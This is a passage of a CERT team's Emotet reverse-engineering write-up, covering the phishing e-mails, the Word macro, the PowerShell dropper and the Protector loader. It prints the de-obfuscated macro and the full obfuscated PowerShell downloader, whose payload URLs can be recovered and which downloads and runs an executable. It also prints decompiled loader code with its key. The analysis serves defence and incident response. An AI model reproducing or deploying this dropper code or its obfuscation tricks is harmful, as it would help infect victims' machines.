By Dimitris Kolotouros and Marios Levogiannis

Reverse engineering Emotet – Our approach to protect
GRNET against the trojan

cert.grnet.gr/en/blog/reverse-engineering-emotet/

Preamble

In October 2020 we observed an outbreak of malicious e-mails reaching GRNET employees’
inboxes. Meanwhile, similar campaigns were also targeting several public and private sector
organizations in Greece. After acquiring dozens of such e-mails, we started planning our
defensive strategy. To do so, we analyzed the malware that was attached to the e-mails and
realized that we were dealing with the infamous Emotet trojan.

In this document, we describe the steps of our analysis, including the reverse engineering
of the malware executables, how we overcame the binary obfuscation techniques it
employed, and how we determined the malware’s internals. In the course of our work, we
were able to discover the list of IP addresses that constituted Emotet’s network of
Command-and-Control (C2) servers. This information was very useful because it let us
detect any network connections from the GRNET network to the Emotet C2 network. Such
connections would indicate a potentially compromised workstation on our premises. Overall,
the goals of our analysis were to (a) create an infrastructure that received new updates of the
Emotet trojan and kept our list of C2 IP addresses up to date, and (b) understand the trojan’s
persistence mechanism in order to perform forensic investigations on compromised workstations.

On January 27, 2021 Europol announced that it had completely taken down Emotet. The
same day our update-monitoring infrastructure received an update which was Europol’s
clean-up payload scheduled to be executed on April 25, 2021 at 12:00 p.m. Hopefully, this
will be the last time that we hear about Emotet. Meanwhile, we had been working on
analyzing Emotet up to the time of Europol’s announcement. We release our analysis results
hoping that IT professionals will find them useful when trying to protect against similar trojans
in the future.

In Chapter 1 we describe the malicious e-mails and the malware dropper (a macro-enabled
MS Word document) delivered via those e-mails. If you are already familiar with Emotet’s
dropper, you may skip directly to the next chapters. In Chapter 2 we analyze the malware’s
multi-layer Protector, which is responsible for unpacking, decrypting and running the trojan
for the first time. In Chapter 3 we describe the binary obfuscation techniques incorporated in
the trojan itself as well as the ways to bypass them. In Chapter 4 we provide an in-depth
description of the trojan’s inner workings, its persistence mechanism, the communication with
the network of Command-and-Control servers and the way we discovered the C2 network.
Finally, in Chapter 5 we briefly describe the process we followed to retrieve and analyze new
payloads served by the C2 network.

We have published the de-compiled code of referenced functions as well as the utilities that
we implemented during the analysis in a GitHub repository.

This work was carried out under the supervision of GRNET’s Chief Information Security
Officer, Dimitris Mitropoulos.

Dimitris Kolotouros – Head of IT Security Department, GRNET
Marios Levogiannis – Senior IT Security Engineer, GRNET

Figure 0. Emotet stages overview

Chapter 1. From the e-mails to the binaries

Introduction

https://www.europol.europa.eu/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action
https://github.com/grnet/emotet-utils

October 2020.

Seven months have passed since the first COVID-19 lockdown in Greece. The pandemic
finds GRNET with a largely broadened IT Security agenda heavily linked with the state’s
current digital transformation (involving several new applications being developed and
maintained in house). The aforementioned developments, together with the work-from-home
style that has just arrived, completely redefined the security perimeter and priorities of
GRNET CERT. A new era comes with new challenges.

Somewhere in between the various ongoing tasks, a number of weird-looking e-mails that
reached GRNET employees came to our notice. They all had a similar form, i.e., replies to
legitimate e-mails that contained either a URL or an encrypted ZIP attachment and its password.

The e-mails

First, to raise awareness, we notified all GRNET employees. Then, we started collecting and
analyzing the suspicious e-mails. Initially, we inspected their source code looking for
similarities.


Figure 1. E-mails delivering Emotet dropper via URL (left) and attachment (right). The
screenshots are annotated to show the original sender's display name paired with a different
e-mail address, the original e-mail subject, the quoted original e-mail body, and a link whose
actual target differs from its displayed text.

Our analysis led to several interesting remarks:

- All e-mails were replies to legitimate e-mails. The e-mail subject followed a specific
  pattern, i.e., “Re: <ORIGINAL MAIL SUBJECT>”. Also, the e-mail body contained the
  quoted original e-mail body.
- The sender’s display name was altered to match that of the original e-mail. However, the
  sender’s e-mail address was some unrelated address (several compromised e-mail
  accounts were used).
- The body of the reply contained either a URL or an attachment.
  - In the case of the URL, the link text showed a legitimate domain name (e.g.
    gmail.com), but the actual target was completely different. Our investigation
    indicated that the targets were compromised websites used by the attackers to host
    the malicious documents.
  - In the case of the attachment, we observed encrypted ZIP files with the
    corresponding password contained in the reply body. Note that password-protected
    attachments are commonly used to bypass malware detection running on e-mail
    servers.

Finally, in all cases we ended up with MS Word documents.

The MS Word documents

By this point, we had already been informed about similar cases affecting other public and
private sector organizations in Greece. Thus, a conventional incident response was not
enough; we wanted to analyze the malware further.

Our analysis started with the Word documents. When opening one of the documents, the
victim sees a fake pop-up window. In fact, this is just an image inside the document imitating
a legitimate pop-up window. The phrasing of the fake pop-up differed from document to
document, but in every case it was there to persuade the victim to enable macro execution.


Figure 2. Fake MS Word pop-ups in Emotet dropper. The first example reads: "Operation did
not complete successfully because the file was created on Android device. To view and edit
document click “Enable Editing” and then click “Enable Content”." The second reads: "You are
attempting to open a file that was created in an earlier version of Microsoft Office. If the
file opens in Protected View, click Enable Edition and then click Enable Content."

We will continue by analyzing one of the MS Word documents. All other documents were
similar to the one examined, albeit with minor differences.

The VBScript Macros

To see what would happen when a user enabled the macros, we examined the
corresponding VBScript. The entry point Document_open() called function
Q4hxwcihtett() of module Iauesnh6lzhaf:

Figure 3. The VBScript macro entry-point

The function code, as we observe below, was obfuscated:

Figure 4. The main VBScript macro module

We started following the code flow manually to understand it. This manual process revealed
that most of the code was indeed irrelevant. Specifically, for each meaningful code
instruction, the obfuscation process had generated a bunch of meaningless instructions
placed before the meaningful one. So, most of the de-obfuscation effort went into identifying
each block and isolating the meaningful instruction within it.

Luckily enough, the attackers had left some traces that were helpful for us. As we noticed,
their obfuscating tool had a serious issue (nobody’s perfect). In particular, it did not apply the
indentation of the original instruction to the instructions of the replacement block. As a result,
the original indentation could be found on the first instruction of each block. This issue gave
us a way to automatically detect the blocks and isolate the last instruction of each block,
which we knew was the meaningful instruction of the block.
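
The block detection described above can be sketched in a few lines of Python. This is only an illustration, not the tool we actually used: it assumes that the first instruction of each block is the only one carrying leading whitespace, that the remaining instructions of the block start at column 0, and that statements are not split with line continuations. The function names and the sample lines are hypothetical.

```python
def split_into_blocks(lines):
    """Group obfuscated macro lines into blocks.

    Assumption: a line with leading whitespace opens a new block and the
    unindented lines after it belong to the same block.
    """
    blocks = []
    for line in lines:
        if not line.strip():
            continue  # ignore empty lines
        opens_block = line[0] in " \t"
        if opens_block or not blocks:
            blocks.append([line])
        else:
            blocks[-1].append(line)
    return blocks


def meaningful_instructions(lines):
    """Keep the last instruction of each block, re-applying the block's indentation."""
    result = []
    for block in split_into_blocks(lines):
        first = block[0]
        indent = first[: len(first) - len(first.lstrip())]
        result.append(indent + block[-1].strip())
    return result


# Made-up sample: two blocks, each ending with its meaningful instruction.
sample = [
    "   junkA = 1 / 0",
    "junkB = Len(junkA)",
    'Set realObject = CreateObject("x")',
    "   junkC = junkB",
    "realObject.Run",
]
print(meaningful_instructions(sample))
```

A real macro would also need statements joined across line-continuation characters before this step.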

The following obfuscation techniques were identified:

- Deliberate run-time errors in junk instructions (which were ignored because of the On
  Error Resume Next statement),
- String construction using one or more of the following:
  - String concatenation,
  - Use of undefined variables that resolve to empty strings,
  - String replacements with the Replace() function,
  - Conversion of character codes to strings with the ChrW() function,
  - Retrieval of values from hidden user form control elements,
- Alternation between upper and lower case letters in symbol names, exploiting the case
  insensitivity of the macro language,
- Use of the line-continuation character _ to break statements across multiple lines.
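
To illustrate how the string-construction tricks collapse, here is a minimal Python sketch that folds a simple obfuscated string expression into its final value. It is a simplification under stated assumptions: the expression contains only string literals, ChrW() calls with numeric arguments, undefined variables and concatenation operators. The function name and the sample expression are hypothetical, not taken from the actual macro.

```python
import re


def fold_vba_string(expression, junk=""):
    """Evaluate a simple obfuscated VBA string expression.

    Handles ChrW(n) calls and concatenation of string literals; undefined
    variables resolve to empty strings, so they are simply ignored.
    Finally removes the junk marker, as Replace(expr, junk, "") would.
    """
    def chrw_to_literal(match):
        char = chr(int(match.group(1)))
        # A double quote inside a VBA literal is written as two quotes.
        return '"' + char.replace('"', '""') + '"'

    expression = re.sub(r"ChrW\(\s*(\d+)\s*\)", chrw_to_literal,
                        expression, flags=re.IGNORECASE)
    literals = re.findall(r'"((?:[^"]|"")*)"', expression)
    text = "".join(part.replace('""', '"') for part in literals)
    return text.replace(junk, "") if junk else text


print(fold_vba_string('"po" + Xq1 + ChrW(119) & "er][x" + "she" & Zz9 & "ll"', junk="][x"))
```

Values retrieved from hidden form controls cannot be folded this way; they have to be read from the document itself.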

Then, we only had to manually de-obfuscate some lines of code (the original number of lines
was a little more than 400). The result was the following:

01: Rem Attribute VBA_ModuleType=VBADocumentModule
02: Option VBASupport 1
03: Private Sub Document_open()
04:   Set storyRange = ThisDocument.StoryRanges.Item(1)            ' main text of the document
05:   commandLine = Mid(storyRange, 5, Len(storyRange))            ' skip the first four characters
06:   commandLine = Replace(commandLine, "][ 1) jjkgS [] []w", Empty)  ' strip the junk marker
07:   Set objProcess = CreateObject("winmgmts:Win32_Process")
08:   Set objProcessStartup = CreateObject("winmgmts:Win32_ProcessStartup")
09:   objProcessStartup.ShowWindow = 0                             ' 0 = hidden window
10:   objProcess.Create commandLine, Empty, objProcessStartup      ' spawn the command
11: End Sub

Hence, we were able to answer an important question: “What happens when the user
executes this macro?”

Well, it spawns a process by calling the Win32_Process.Create() method (line 10). The
startup information parameter says “do not show a window” (line 9). Further, the command
line parameter holds the command that will be invoked by the spawned process. As we can
observe in the code, the command is already in the document (lines 4-5) together with some
junk that is removed (line 6).
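
The two string operations of lines 5 and 6 translate directly to Python, which is handy when processing many documents offline. The sketch below assumes the document text has already been extracted to a string; the four-character prefix and the sample command are made up for illustration.

```python
JUNK = "][ 1) jjkgS [] []w"  # junk marker used by this particular document


def extract_command(story_text, junk=JUNK):
    """Mimic Mid(text, 5, Len(text)) followed by Replace(text, junk, Empty)."""
    # VBA's Mid() is 1-based, so position 5 corresponds to Python index 4.
    return story_text[4:].replace(junk, "")


# Hypothetical hidden text: four leading characters, then a command
# interleaved with the junk marker.
hidden_text = "XXXXcm" + JUNK + "d /c e" + JUNK + "cho hi"
print(extract_command(hidden_text))
```

Since the junk marker differed between documents, it has to be read from each macro before this step can be applied.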

So there was something more in the document itself apart from the fake popup window.

The PowerShell script

First, we removed the formatting. In this way we revealed a paragraph that was kept out of
the victim’s sight (it was formatted with a font size of 2px and a white font color):


Figure 5. Obfuscated PowerShell command hidden in document body

This looked obfuscated, too. But we already knew how to de-obfuscate it, i.e.
Replace(commandLine, "][ 1) jjkgS [] []w", Empty):

Figure 6. De-obfuscated PowerShell command

The resulting command attempts to run a PowerShell script that is encoded in base64 format.
We decoded it to discover the actual PowerShell script:

Figure 7. Base64-decoded PowerShell script

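
The decoding step can be reproduced with a short Python sketch. It assumes the script was passed through PowerShell's encoded-command parameter, which expects the base64 encoding of UTF-16LE text; if a sample used a different encoding, the decode call would need adjusting. The function name and the sample payload are hypothetical.

```python
import base64


def decode_encoded_command(b64_text):
    """Decode an encoded-command style payload (base64 of UTF-16LE text)."""
    return base64.b64decode(b64_text).decode("utf-16-le")


# Round trip with a harmless, made-up command.
sample_payload = base64.b64encode("Write-Output 'hi'".encode("utf-16-le")).decode("ascii")
print(decode_encoded_command(sample_payload))
```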
After re-indenting the script, i.e. splitting lines on each ‘;’ and indenting the code blocks
delimited by ‘{’ and ‘}’, we got the following:

$1D2  =[tYpE]("{3}{1}{4}{5}{0}{2}"-f 'ecTo','SteM.','Ry','sy','Io.','diR'); 
$tJ8m4B =[TYpe]("{2}{4}{5}{1}{3}{0}"-f 
'r','iNTmAnAg','sYsteM.nE','e','T','.SerVIcEpO') ; 
$Ysa212g=('N'+('b7ib0'+'0')); 
$S95cz34=$I0phsdk + [char](64) + $Ixdbxto; 
$Qdfg2cp=(('Chns'+'7')+'2'+'d'); 
(dIR variABle:1D2).valuE::"CR`eAteDir`ectory"($HOME + ((('8U'+'L')+('Pj'+'q')+
('6t3'+'_8UL'+'Jvn'+'k')+('7'+'yk')+('8U'+'L'))."R`e`place"(('8'+'UL'),'\'))); 
$Qo08jci=('F'+'5'+('ocx'+'ex')); 
(  ITEM  vARIAblE:Tj8M4B ).VAlUe::"SeC`U`RI`TyPRoTOc`OL" = (('Tl'+'s1')+'2'); 
$R7w053i=(('Nue'+'l2')+'4'+'k'); 
$Tedbr00 = ('N'+'1p'+('jur'+'3u')); 
$H_8yni0=('J6'+'a'+('f'+'fv6')); 
$Roz09dp=('V'+('t9'+'1oph')); 
$Glkvf7b=$HOME+(('{0'+'}Pjq6'+'t'+'3_'+'{0'+'}Jvnk7yk{0}') -F[Char]92)+$Tedbr00+
('.e'+'xe'); 
$Ads4mxg=(('E'+'2n')+'0j'+'qo'); 
$Q4b1g5n=.('new-o'+'b'+'jec'+'t') nEt.WEBcLieNt; 
$Boiep01=((('ht'+'tp:]['+' ')+'1'+((') '))+'jj'+(('kgS [] []w'+']['+' 1)'+' '))+
('jj'+'kgS []')+(' []wi'+'nnh')+('anma'+'chn.')+(('com]'+'[ 1) '))+'j'+('jkgS'+' 
[]')+(' []'+'w')+'wp'+('-'+'adm')+(('in][ '+'1)'+' j'))+('j'+'kg')+('S []'+' 
[]')+'w'+('sA'+']')+'['+((' 1'+') jjkg'+'S'))+' '+'['+('] '+'[')+']w'+'@h'+
(('ttp:'+']'+'[ '+'1) jj'))+('k'+'gS ')+('[]'+' ')+'['+']'+(('w]['+' 1)'))+(' 
j'+'j')+('kgS []'+' []'+'wsh')+'om'+'al'+('house'+'.co')+('m]'+'[')+' 1'+((')'+' 
jjkg'))+('S '+'[]')+(' []wwp-'+'in'+'c'+'lu')+'de'+('s'+'][')+' 1'+((') '))+
('j'+'jk')+'g'+'S '+('[]'+' [')+(']w'+'I')+('D3'+'][')+' 1'+')'+(' jjk'+'g')+('S 
'+'[]')+' '+(('['+']wI'+'Dz][ 1)'))+(' jjkg'+'S')+' '+('[] '+'['+']w@h')+
('ttp'+':]'+'[ ')+(('1)'))+(' '+'jjkgS '+'[] ')+('[]'+'w][')+((' '+'1)'))+(' 
'+'jjk')+('g'+'S []')+(' ['+']')+'wb'+'lo'+('g'+'.ma')+('r'+'tyr')+('ol'+'ni')+
('ck.'+'com')+']'+('['+' 1')+((')'+' j'))+'jk'+('gS'+' [] '+'[')+(']wwp'+'-'+'adm')+
('in'+']')+(('[ 1) '+'jj'))+'k'+('gS ['+'] ')+('['+']wS')+('pq]'+'[ 1')+((') 
'))+'j'+'jk'+('gS [] []'+'w'+'@htt')+'p'+'s:'+']'+(('[ '+'1) j'+'jkgS '))+'[]'+' '+
('['+']w]')+'['+' 1'+((') '))+'jj'+('kgS [] ['+']wwww'+'.f')+'r'+
('ajamom'+'ad'+'ri'+'d.c'+'om')+(']'+'[ 1')+((') j'+'j'))+'kg'+'S '+('[] ['+']w')+
('wp'+'-')+('cont'+'e')+('nt'+']')+'[ '+'1'+((')'+' j'))+('jk'+'g')+'S'+(' ['+']')+(' 
'+'[]wg]')+(('[ 1)'+' j'+'jkg'))+'S '+('[]'+' ')+('['+']w@h')+'tt'+(('p'+'s:'+'][ 
1'+') '+'jjk'+'gS [] '))+('[]w]['+' ')+(('1)'+' '))+('jjkg'+'S ['+']')+' ['+']w'+
('p'+'esqui')+('s'+'ac')+'re'+'d'+(('.'+'com][ 1) jj'+'k'))+'g'+'S '+'[]'+(' 
[]w'+'vmw')+('ar'+'e-unl')+('ock'+'e')+('r'+'][ 1')+((') '))+('j'+'jk')+'g'+('S ['+'] 
')+('['+']w')+'da'+'C'+']'+'['+((' '+'1) '+'jj'))+('kg'+'S')+' '+('[]'+' 
')+'[]'+'w'+'@'+('ht'+'tp')+'s:'+']['+((' 1)'+' '))+'j'+'j'+('k'+'gS')+(' ['+']')+(' 
['+']')+('w][ '+'1')+')'+' '+('jj'+'kgS ')+'['+(']'+' []wme')+'d'+('h'+'em')+
(('pfa'+'rm.c'+'om]'+'[ 1)'))+' '+('jj'+'kg')+('S'+' [] [')+(']wwp'+'-a')+'dm'+
('in'+']')+'['+' '+'1'+((') jjkgS ['+']'+' []w'+'L'))+'b'+(('][ 1'+') jj'))+
('k'+'gS'+' []')+' '+'[]'+'w'+'@h'+('t'+'tp:][ 1')+')'+(' j'+'jkgS []'+' ')+'['+
(']w]'+'[')+((' 1'+')'))+(' '+'jj')+('kg'+'S []'+' []')+'w'+('ien'+'g')+
('li'+'sha')+'bc'+('.c'+'o')+(('m]['+' 1)'+' j'))+('jk'+'gS')+((' '+'[]'+' 
['+']wc'+'ow][ 1'+') '))+'jj'+'k'+('gS'+' ')+'['+']'+(' '+'[]')+('w2B'+'B')+(('][ 
'+'1)'))+' '+'j'+('jk'+'g')+('S '+'[] ')+'[]'+'w'))."R`ep`lacE"(((']['+((' '+'1) 
jjkg'+'S []'))+' '+('[]'+'w'))),([array]('/'),('x'+'we'))[0])."S`PliT"($Od7ccw9 + 
$S95cz34 + $On55ljg); 
$Q9eccc5=(('F'+'o4')+'g'+('2'+'rk')); 
foreach ($S7m_bsh in $Boiep01){ 
   try{ 
       $Q4b1g5n."d`oWnL`Oa`DfIlE"($S7m_bsh, $Glkvf7b); 
       $E4fktea=('D'+'li'+('0'+'4n_')); 
       If ((&('Get'+'-Ite'+'m') $Glkvf7b)."l`e`Ngth" -ge 47912) { 
           ([wmiclass]('wi'+('n'+'32')+'_P'+('r'+'ocess')))."CR`e`AtE"($Glkvf7b); 
           $Klmmlcr=(('V6z'+'43'+'q')+'d'); 
           break; 
           $Myse8pt=('S8'+('266j'+'7')) 
       } 
   } catch{ 
 
   } 
} 
$Xwnf9b5=('R_'+('1kl'+'w')+'o')

We then noticed some common obfuscation techniques:

- String formatting to scramble string elements (e.g. "{3}{1}{4}{5}{0}{2}"-f
  'ecTo','SteM.','Ry','sy','Io.','diR'),
- Insertion of the backtick escape character ( ` ) in symbol names (e.g. d`oWnL`Oa`DfIlE),
- Alternation between upper and lower case letters in symbol names, exploiting the case
  insensitivity of PowerShell (e.g. nEt.WEBcLieNt),
- String construction with concatenation and junk removal with the Replace() method,
- Use of undefined variables in string concatenations that actually act as empty strings,
  and
- Insertion of irrelevant code instructions.
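
The first two techniques can be undone without a PowerShell interpreter. The following Python sketch is a simplified illustration: it supports only plain {N} placeholders of the -f operator, and it assumes that the character after each backtick has no special escape meaning (which holds for the examples above but not in general, e.g. for `n or `t). The function names are hypothetical.

```python
import re


def apply_format_operator(template, arguments):
    """Evaluate a PowerShell -f expression that uses plain {N} placeholders."""
    return re.sub(r"\{(\d+)\}", lambda m: arguments[int(m.group(1))], template)


def strip_backticks(name):
    """Drop the backticks inserted into a symbol name (see assumption above)."""
    return name.replace("`", "")


type_name = apply_format_operator(
    "{3}{1}{4}{5}{0}{2}", ["ecTo", "SteM.", "Ry", "sy", "Io.", "diR"]
)
# Names are case-insensitive, so lower-casing them makes them readable.
print(type_name.lower())                              # system.io.directory
print(strip_backticks("d`oWnL`Oa`DfIlE").lower())     # downloadfile
```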

We then used a PowerShell interpreter to evaluate strings and after removing irrelevant
instructions and renaming the variables, we had the de-obfuscated code:

# Create the target directory under the user's home folder
[System.IO.Directory]::CreateDirectory($HOME + "\Pjq6t3_\Jvnk7yk\");
# Force TLS 1.2 for the HTTPS downloads
[System.Net.ServicePointManager]::SecurityProtocol = "Tls12";
$filepath = $HOME + "\Pjq6t3_\Jvnk7yk\N1pjur3u.exe";
$webclient = New-Object System.Net.WebClient;
$urls = "http://in*******hn.com/wp-admin/sA/",
   "http://sh*******se.com/wp-includes/ID3/IDz/",
   "http://blog.ma********ck.com/wp-admin/Spq/",
   "https://www.fr*********id.com/wp-content/g/",
   "https://pe********ed.com/vmware-unlocker/daC/",
   "https://me*******rm.com/wp-admin/Lb/",
   "http://ie*******bc.com/cow/2BB/";
# Try each URL in turn until a large enough file has been downloaded
foreach ($url in $urls) {
   try {
       $webclient.DownloadFile($url, $filepath);
       # Files below the threshold (e.g. an HTML error page) are skipped
       If ((Get-Item $filepath).Length -ge 47912) {
           ([wmiclass]("Win32_Process")).Create($filepath);
           break;
       }
   } catch {}
}
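
In the obfuscated listing, the URL list is built as one long string in which the junk marker stands in for every ‘/’ and the ‘@’ character ([char](64)) separates the URLs. A minimal Python sketch of that recovery step follows; the function name is hypothetical and the sample uses placeholder example domains instead of the real ones.

```python
JUNK = "][ 1) jjkgS [] []w"  # junk marker used by this particular script


def recover_urls(blob, junk=JUNK, separator="@"):
    """Replace the junk marker with '/' and split the result into URLs."""
    return blob.replace(junk, "/").split(separator)


# Made-up blob following the same construction as the obfuscated script.
blob = ("http:" + JUNK + JUNK + "a.example" + JUNK + "x" + JUNK
        + "@https:" + JUNK + JUNK + "b.example" + JUNK + "y" + JUNK)
print(recover_urls(blob))
```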


The outcome was a pretty simple script. It attempts to download an executable file from
several URLs and store it in the path $HOME\Pjq6t3_\Jvnk7yk\N1pjur3u.exe (the URLs and
the path were different in each Word document). The size of each downloaded file is checked
against a minimum value, so that if the executable has been removed from the compromised
website, the 404 HTML page is ignored and the next URL is tried. When a sufficiently large
file has been downloaded, it gets executed in a new process by calling the
Win32_Process.Create() method.
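
The fallback logic is easy to express as a pure function, which can be useful when replaying captured responses offline. The sketch below is an illustration only: `fetch` is a caller-supplied function (hypothetical here) that maps a URL to the bytes it returned, so no network access is involved, and the threshold is the one used by this particular script.

```python
MIN_SIZE = 47912  # minimum size checked by this particular script


def first_plausible_payload(urls, fetch, min_size=MIN_SIZE):
    """Return (url, data) for the first URL whose body is at least min_size bytes.

    A failing fetch is skipped, like the script's empty catch block; a body
    that is too small (e.g. an HTML error page) is skipped as well.
    """
    for url in urls:
        try:
            data = fetch(url)
        except Exception:
            continue
        if len(data) >= min_size:
            return url, data
    return None


# Made-up captured responses: an error page, a missing host, a large body.
responses = {"u1": b"<html>404</html>", "u3": b"\x00" * 50000}
print(first_plausible_payload(["u1", "u2", "u3"], responses.__getitem__)[0])
```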

After following the same de-obfuscation procedure on every Word document available, we
fetched the actual malware executables from the URLs described in the PowerShell scripts.
To do so, we imitated the PowerShell User-Agent in a way; we needed to look like a
malicious PowerShell script after all!

PS. During the course of our analysis we came across several compromised e-mail accounts
and websites. In all cases, we sent abuse reports to the corresponding abuse contacts
informing them of their compromised assets.

Chapter 2. From the protector to the trojan

Introduction

In the previous chapter we documented the detection and preliminary analysis of malware
that was distributed via e-mails. We saw that the e-mails delivered an MS Word document
with macros that spawn a new process running a PowerShell script on the victim’s machine.
We also observed that the PowerShell script spawns one more process running an
executable file downloaded from the Internet. Finally, we downloaded several of those
executable files.

With the executable files at hand, we wanted to examine their internals without running them.
Thus, we continued with our reverse engineering process. At this point we started working
with Ghidra, a free, open-source reverse engineering tool that was publicly released in 2019.

The executable files

First, we loaded some of the executable files and observed that they were PE (Portable
Executable) files compiled for the x86 LE architecture.


Figure 8. Emotet Protector’s architecture details

We started looking for meaningful data such as imported symbols and defined strings. To our
surprise, the executables looked like a number of different programs. Also, we noticed that in
every executable file there was one defined string that looked like a random key.
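
We spotted these strings by eye in Ghidra's string listing. For a larger set of samples, a rough heuristic such as the following Python sketch could help shortlist candidates: it extracts printable strings from a binary and ranks them by Shannon entropy, on the assumption that a random key mixes more distinct characters than API names or user-interface text. The function names, the minimum length and the sample data (including the key) are made up for illustration.

```python
import math
import re
from collections import Counter


def printable_strings(data, min_length=16):
    """Yield runs of printable ASCII characters found in a bytes object."""
    for match in re.finditer(rb"[\x20-\x7e]{%d,}" % min_length, data):
        yield match.group().decode("ascii")


def shannon_entropy(text):
    """Entropy in bits per character of the string's character distribution."""
    counts = Counter(text)
    total = len(text)
    return -sum(n / total * math.log2(n / total) for n in counts.values())


def rank_key_candidates(data, min_length=16):
    """Return the printable strings of `data`, most random-looking first."""
    scored = [(shannon_entropy(s), s) for s in printable_strings(data, min_length)]
    return [s for _, s in sorted(scored, reverse=True)]


# Made-up binary content: ordinary strings plus one key-like string.
sample = (b"\x00InitializeCriticalSection\x00"
          b"MathDrawer could not save the graph\x00"
          b"qW3$zL9@xT7&bN5!mK2^pV8*\x00RegOpenKeyA\x00")
print(rank_key_candidates(sample)[0])
```

Such a ranking only narrows the search; the candidate still has to be confirmed by checking how the code uses it.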

Figure 9. Random keys in various Emotet Protectors’ strings (Ghidra “Defined Strings”
listings of three Protector samples; in each listing, ordinary API names and application
strings, such as those of a function-graphing program called MathDrawer, surround a single
random-looking string)

Apart from that, all the other strings seemed to differ between the executable files. Assuming
that this is not a coincidence, we looked for references to these strings in the de-compiled
code. While looking, we noticed one more similarity: although the surrounding code also
seemed to differ between the executable files, there was an identical code pattern that
consumed the alleged key.

Figure 10. Code referencing the keys in various Protectors (Ghidra decompiler output from
three samples; in each, the code resolves LdrFindResource_U and LdrAccessResource from
ntdll.dll, allocates memory with VirtualAlloc, copies a resource into it, passes the key string
to one function and the buffer to a second one, and then calls the buffer)

We reverse engineered this part of the code, and ended up with the following code:

WPARAM FUN_00407b2e(HINSTANCE param_1,int param_2) 
 
{ 
 byte *resourceBuffer; 
 _LDR_RESOURCE_INFO resourceInfo; 
 _IMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry; 
 void *resource; 
 word iv; 
 dword resourceSize; 
... 
   resource = (void *)0x0; 
   resourceSize = 0; 
   resourceInfo.Type = 10; 
   resourceInfo.Name = 0x1e55; 
   resourceInfo.Language = 0x409; 
... 
   _LdrFindResource_U_PTR = GetProcAddress(s_ntdll_Module2,s_LdrFindResource_U_0040d8cc); 
... 
   _LdrAccessResource_PTR = GetProcAddress(s_ntdll_Module2,s_LdrAccessResource_0040d8b4); 
   iVar3 = (*_LdrFindResource_U_PTR)(0x400000,&resourceInfo,3,&ResourceDataEntry); 
   if (-1 < iVar3) { 
     (*_LdrAccessResource_PTR)(0x400000,ResourceDataEntry,&resource,&resourceSize); 
   } 
   resourceBuffer = (byte *)VirtualAlloc((LPVOID)0x0,resourceSize,0x1000,0x40);
   memcpy(resourceBuffer,resource,resourceSize); 
   DeriveKey(s_*FLrY4bO%4Th$J8Gt0z*zKiB)Yb#mGNy_0040d5b4,0x57,(uint)&iv); 
   DecryptResource(resourceBuffer,resourceSize,&iv); 
   (*(code *)resourceBuffer)(); 
... 
}

The code above has the following functionality:

Allocates an executable memory region with VirtualAlloc() , where 0x40
corresponds to PAGE_EXECUTE_READWRITE  protection level,
loads a specific resource from the executable’s resources into this region,
derives a decryption key from the previously mentioned main key,
decrypts the contents of the resource using the derived key, and finally,
uses the reference to the decrypted data as a function pointer and calls the function.

In deriveKey.c and decryptResource.c we include the reverse engineered code of the
functions.

The attackers hid the actual payload in the resource described by the
following RESOURCE_INFO  variable:

resourceInfo.Type = 10; 
resourceInfo.Name = 0x1e55; 
resourceInfo.Language = 0x409;

https://github.com/grnet/emotet-utils/blob/master/decompiled/deriveKey.c
https://github.com/grnet/emotet-utils/blob/master/decompiled/decryptResource.c



We found the payload in the resources section of the executable file, just below this mouse
icon:

Figure 11. The encrypted payload in Emotet Protector’s resources
At that point we had the encrypted payload, the main key, the key derivation function and the
decryption function. The only thing left was to decrypt the payload. So we reused the
reverse engineered DeriveKey() and DecryptResource() functions to write a small
decryption tool. After that we were able to decrypt the resource.

The decrypted resource

Loading the decrypted resource in Ghidra was not just a drag-n-drop task. Apparently, there
were no executable headers to let Ghidra infer the architecture details. However, we knew
that this payload was loaded in the memory space of the initial executable so we only had to
define the architecture to be the same as the initial executable. Furthermore, we knew that
the executable starts with a function (the pointer to the memory was handled as a function
pointer as previously described). With a little manual work, we managed to analyze the
payload with Ghidra:

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-encrypted-resource.png



Figure 12. The decrypted resource’s entry-point
As shown above, the code pushes some values onto the stack and then calls function
FUN_0000002d(). The values pushed onto the stack must be the function arguments. Among
these values we noticed 0x529 and 0x31529, which Ghidra analyzed as memory
references ( DAT_0000052e and DAT_0003152e ).

DAT_0003152e  contains the last 5 bytes of the executable representing the null-terminated
string “ dave ” that looked like a magic value.

Figure 13. The referenced DAT_0003152e in decrypted resource
DAT_0000052e was more interesting. The first two bytes were the printable characters
“MZ”. As you probably know this is the header signature of DOS MZ executables. This was a
very good lead.

The file can be identified by the ASCII string “MZ” (hexadecimal: 4D 5A) at the
beginning of the file (the “magic number”). “MZ” are the initials of Mark Zbikowski, one
of the leading developers of MS-DOS.

Wikipedia

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-entry.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-param2-dave.png
https://en.wikipedia.org/wiki/DOS_MZ_executable



Figure 14. The MZ magic value in the decrypted resource
By further examining the contents of DAT_0000052e , we identified some known MS-DOS
stub strings, such as the “This program cannot be run in DOS mode”. Of course this
resembles a PE executable.

Figure 15. The MS-DOS stub in the decrypted resource
We went on reversing the FUN_0000002d()  function assuming that its first argument is a
reference to a PE executable.
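
The check we did by eye (an “MZ” signature followed by a PE header) can be automated. Below is a minimal sketch, not part of our published tooling, that scans a decrypted blob for embedded PE images. It relies only on the documented DOS header layout, where the 32-bit field at offset 0x3C ( e_lfanew ) points to the “PE\0\0” signature. The function name find_embedded_pe is our own choice for illustration.

```python
import struct


def find_embedded_pe(blob):
    """Return the offsets inside blob that look like the start of a PE image."""
    offsets = []
    pos = blob.find(b"MZ")
    while pos != -1:
        # The DOS header is 0x40 bytes long; e_lfanew sits at offset 0x3C.
        if pos + 0x40 <= len(blob):
            (e_lfanew,) = struct.unpack_from("<I", blob, pos + 0x3C)
            pe_offset = pos + e_lfanew
            # A real PE image has the 4-byte signature "PE\0\0" at e_lfanew.
            if blob[pe_offset:pe_offset + 4] == b"PE\x00\x00":
                offsets.append(pos)
        pos = blob.find(b"MZ", pos + 1)
    return offsets
```

Running it on a blob laid out like our decrypted resource would report the offset of the nested executable, which can then be carved out into a separate file.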

https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-stage2-param1-mz.png
https://cert.grnet.gr/wp-content/uploads/2021/02/emotet-protector-param1-msdos-stub-edited-1.png



The first difficulty was the mysterious function named FUN_00000456(). This function is
